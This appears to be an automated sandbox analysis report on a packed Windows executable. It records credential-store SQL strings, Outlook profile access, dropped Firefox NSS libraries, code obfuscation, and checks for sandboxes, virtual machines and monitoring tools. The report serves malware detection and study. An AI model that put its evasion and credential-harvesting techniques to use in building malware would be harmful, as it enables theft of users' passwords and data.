Source: file.exe, 00000000.00000002.2380999461.000000001D6F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2391962093.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2392418682.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2380999461.000000001D6F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2391962093.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2392418682.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2380999461.000000001D6F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2391962093.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2392418682.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2380999461.000000001D6F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2391962093.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2380999461.000000001D6F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2391962093.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2392418682.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2204986163.000000001D5F4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220232339.000000001D610000.00000004.00000020.00020000.00000000.sdmp, HJDBAFIECGHCBFIDGDAA.0.dr, HJJECBKKECFIEBGCAKJK.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2380999461.000000001D6F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2391962093.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2380999461.000000001D6F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2391962093.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 52%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1881088 > 1048576

Source: file.exe

Static PE information: Raw size of whlvtsns is bigger than: 0x100000 < 0x1a5200

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2392162329.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2392418682.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2392418682.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2392162329.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.5e0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;whlvtsns:EW;upocvnzt:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;whlvtsns:EW;upocvnzt:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_005F9860

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1d47fa should be: 0x1d2729

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: whlvtsns
Source: file.exe	Static PE information: section name: upocvnzt
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A898B8 push 752F2E14h; mov dword ptr [esp], ebx	0_2_00A8995F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A8D8B9 push ecx; mov dword ptr [esp], edi	0_2_00A8D8DA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A1C094 push 2A70EB4Ah; mov dword ptr [esp], eax	0_2_00A1C142
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A650E4 push esi; mov dword ptr [esp], edi	0_2_00A6510B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A650E4 push 17D52A00h; mov dword ptr [esp], ebx	0_2_00A6519D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009FA0D9 push ebp; mov dword ptr [esp], 147702F2h	0_2_009FA176
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5B8E8 push ebp; mov dword ptr [esp], 48AD2B5Dh	0_2_00A5B910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5B8E8 push esi; mov dword ptr [esp], 6FEF0F4Ah	0_2_00A5B946
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push 0885AC35h; mov dword ptr [esp], ebp	0_2_009B48DA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push 71C4C1D1h; mov dword ptr [esp], ecx	0_2_009B494C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push ebx; mov dword ptr [esp], 4FDB2F2Ah	0_2_009B49F6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push 7765AF13h; mov dword ptr [esp], ebx	0_2_009B4B16
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push edx; mov dword ptr [esp], eax	0_2_009B4B30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push 5F527E21h; mov dword ptr [esp], edx	0_2_009B4B47
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push esi; mov dword ptr [esp], 6FF5C0C9h	0_2_009B4BCE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push eax; mov dword ptr [esp], edx	0_2_009B4BD6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push 19522B9Dh; mov dword ptr [esp], ecx	0_2_009B4C65
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push 3BF5C945h; mov dword ptr [esp], ebx	0_2_009B4CA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push 40B4C11Fh; mov dword ptr [esp], ebp	0_2_009B4CF4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push eax; mov dword ptr [esp], ecx	0_2_009B4DCE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push 6B4A07E8h; mov dword ptr [esp], edx	0_2_009B4F5F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push ebp; mov dword ptr [esp], ecx	0_2_009B5127
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push edi; mov dword ptr [esp], 3FBEA4C6h	0_2_009B5150
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push 0726099Dh; mov dword ptr [esp], ecx	0_2_009B5163
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push edx; mov dword ptr [esp], eax	0_2_009B518E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push 088EB0B5h; mov dword ptr [esp], edi	0_2_009B523F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push esi; mov dword ptr [esp], edx	0_2_009B5300
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push edx; mov dword ptr [esp], ebx	0_2_009B531D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push eax; mov dword ptr [esp], ebp	0_2_009B535D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push ebx; mov dword ptr [esp], edx	0_2_009B5393
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push ebp; mov dword ptr [esp], esi	0_2_009B53ED

Source: file.exe

Static PE information: section name: whlvtsns entropy: 7.952917726453824

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_005F9860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C069B second address: 9C06A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C0B51 second address: 9C0B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C0B55 second address: 9C0B59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C0B59 second address: 9C0B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE9A87AE1F3h 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C0B77 second address: 9C0BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FE9A9298656h 0x0000000a popad 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE9A9298666h 0x00000014 jc 00007FE9A9298656h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C0BA2 second address: 9C0BA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C0BA6 second address: 9C0BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C0BAC second address: 9C0BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C0E90 second address: 9C0E9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C0E9E second address: 9C0EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C294A second address: 9C294E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C294E second address: 9C2983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pop ecx 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FE9A87AE1F1h 0x0000001a jmp 00007FE9A87AE1EEh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2983 second address: 9C29B9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007FE9A9298656h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jnp 00007FE9A929865Eh 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 pushad 0x00000019 jmp 00007FE9A9298661h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C29B9 second address: 9C29BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2AF3 second address: 9C2B1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FE9A9298656h 0x00000009 ja 00007FE9A9298656h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 push 00000000h 0x00000017 mov edx, dword ptr [ebp+122D3A62h] 0x0000001d call 00007FE9A9298659h 0x00000022 push eax 0x00000023 push edx 0x00000024 push ecx 0x00000025 pushad 0x00000026 popad 0x00000027 pop ecx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2B1F second address: 9C2B24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2B24 second address: 9C2B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A9298667h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2B4B second address: 9C2B51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2B51 second address: 9C2B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2B55 second address: 9C2B77 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE9A87AE1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jng 00007FE9A87AE1ECh 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2B77 second address: 9C2B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jl 00007FE9A9298658h 0x0000000d popad 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2D33 second address: 9C2D50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9A87AE1F9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2DF2 second address: 9C2DF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2DF6 second address: 9C2DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D54C3 second address: 9D54DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE9A9298664h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E3D2C second address: 9E3D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B43B1 second address: 9B43C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A929865Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B43C0 second address: 9B43DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE9A87AE1F5h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E4246 second address: 9E424A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E424A second address: 9E4250 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D959F second address: 9D95C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A9298662h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jng 00007FE9A9298656h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D95C0 second address: 9D95C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D95C4 second address: 9D960F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FE9A9298679h 0x00000011 jmp 00007FE9A929865Eh 0x00000016 jmp 00007FE9A9298665h 0x0000001b pushad 0x0000001c jmp 00007FE9A929865Bh 0x00000021 jbe 00007FE9A9298656h 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c rdtsc
